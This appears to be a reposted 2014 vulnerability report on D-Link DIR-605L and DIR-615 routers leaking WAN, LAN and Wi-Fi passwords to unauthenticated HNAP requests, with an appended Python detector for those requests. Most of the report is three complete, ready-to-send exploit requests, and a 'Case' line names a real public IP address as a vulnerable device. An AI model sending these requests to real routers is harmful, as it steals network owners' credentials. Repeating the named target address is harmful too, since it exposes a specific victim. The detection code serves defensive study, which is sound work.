Two D-Link routers disclose the broadband account, Wi-Fi and other passwords in response to specific POST requests

2014-09-30 04:35

Firmware version: 1.12

Hardware version: Ax

Model: DIR-605L

Addendum: model DIR-615 is also affected.



Retrieving the broadband account and related information

POST /HNAP1/ HTTP/1.0

Connection: keep-alive

Content-Length: 331

SOAPAction: "http://purenetworks.com/HNAP1/GetWanSettings"

Host: <address>:8080

Accept: text/html, */*

Accept-Encoding: identity

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1



<?xml version="1.0" encoding="utf-8"?>

<soap:Envelope

xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

xmlns:xsd="http://www.w3.org/2001/XMLSchema"

xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">

<soap:Body>

<GetWanSettings xmlns="http://purenetworks.com/HNAP1/">

</GetWanSettings>

</soap:Body>

</soap:Envelope>





Retrieving the router's LAN address information

POST /HNAP1/ HTTP/1.0

Connection: keep-alive

Content-Length: 343

SOAPAction: "http://purenetworks.com/HNAP1/GetRouterLanSettings"

Host: <address>:8080

Accept: text/html, */*

Accept-Encoding: identity

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1



<?xml version="1.0" encoding="utf-8"?>

<soap:Envelope

xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

xmlns:xsd="http://www.w3.org/2001/XMLSchema"

xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">

<soap:Body>

<GetRouterLanSettings xmlns="http://purenetworks.com/HNAP1/">

</GetRouterLanSettings>

</soap:Body>

</soap:Envelope>





Retrieving the Wi-Fi password and related information

POST /HNAP1/ HTTP/1.0

Connection: keep-alive

Content-Length: 380

SOAPAction: "http://purenetworks.com/HNAP1/GetWLanRadioSecurity"

Host: <address>:8080

Accept: text/html, */*

Accept-Encoding: identity

User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1



<?xml version="1.0" encoding="utf-8"?>

<soap:Envelope

xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

xmlns:xsd="http://www.w3.org/2001/XMLSchema"

xmlns:soap="http://schemas.xmlsoap.org/soap/encoding/">

<soap:Body>

<GetWLanRadioSecurity xmlns="http://purenetworks.com/HNAP1/">

<RadioID>2.4GHZ</RadioID>

</GetWLanRadioSecurity>

</soap:Body>

</soap:Envelope>
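A detection sketch for the three requests above, added here and not part of the original report: it flags captured HTTP requests that POST to /HNAP1/ with one of the three SOAPAction values shown and carry no Authorization header. The function names and the sample requests are constructed for illustration.

```python
import re

# Action names taken from the SOAPAction headers of the three requests on this page.
SENSITIVE_ACTIONS = {"GetWanSettings", "GetRouterLanSettings", "GetWLanRadioSecurity"}
ACTION_RE = re.compile(r'^"?http://purenetworks\.com/HNAP1/(\w+)"?$')

def parse_request(raw):
    """Return (method, path, headers) for a raw HTTP request; header names lowercased."""
    head = raw.replace("\r\n", "\n").split("\n\n", 1)[0]
    lines = [line for line in head.split("\n") if line.strip()]
    parts = lines[0].split() if lines else []
    if len(parts) < 2:
        raise ValueError("malformed request line")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return parts[0].upper(), parts[1], headers

def flag_hnap_request(raw):
    """Return the action name when raw is a POST to /HNAP1/ for a sensitive
    getter with no Authorization header (as in the requests above), else None."""
    try:
        method, path, headers = parse_request(raw)
    except ValueError:
        return None
    if method != "POST" or path.rstrip("/").lower() != "/hnap1":
        return None
    match = ACTION_RE.match(headers.get("soapaction", ""))
    if not match or match.group(1) not in SENSITIVE_ACTIONS:
        return None
    return None if "authorization" in headers else match.group(1)

# Constructed sample requests (192.0.2.1 is a documentation address).
ACTION = 'SOAPAction: "http://purenetworks.com/HNAP1/%s"\r\n'
SAMPLES = [
    "POST /HNAP1/ HTTP/1.0\r\nHost: 192.0.2.1:8080\r\n" + ACTION % "GetWanSettings" + "\r\n<soap/>",
    "POST /HNAP1/ HTTP/1.0\r\nHost: 192.0.2.1:8080\r\nAuthorization: Basic dXNlcjpwYXNz\r\n"
    + ACTION % "GetWLanRadioSecurity" + "\r\n<soap/>",
    "POST /HNAP1/ HTTP/1.0\r\nHost: 192.0.2.1:8080\r\n" + ACTION % "GetDeviceSettings" + "\r\n<soap/>",
    "GET /index.html HTTP/1.1\r\nHost: 192.0.2.1:8080\r\n\r\n",
]

if __name__ == "__main__":
    for number, sample in enumerate(SAMPLES, 1):
        print(number, flag_hnap_request(sample))
```

Only the first sample is flagged; the second carries credentials, the third names an action outside the list, and the fourth is not an HNAP request.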





Case: http://27.45.196.132:8080/

Proof of vulnerability:

1.jpg

2.jpg

3.jpg

Fix:

..

Source: www.wooyun.org/bugs/wooyun-2014-066906
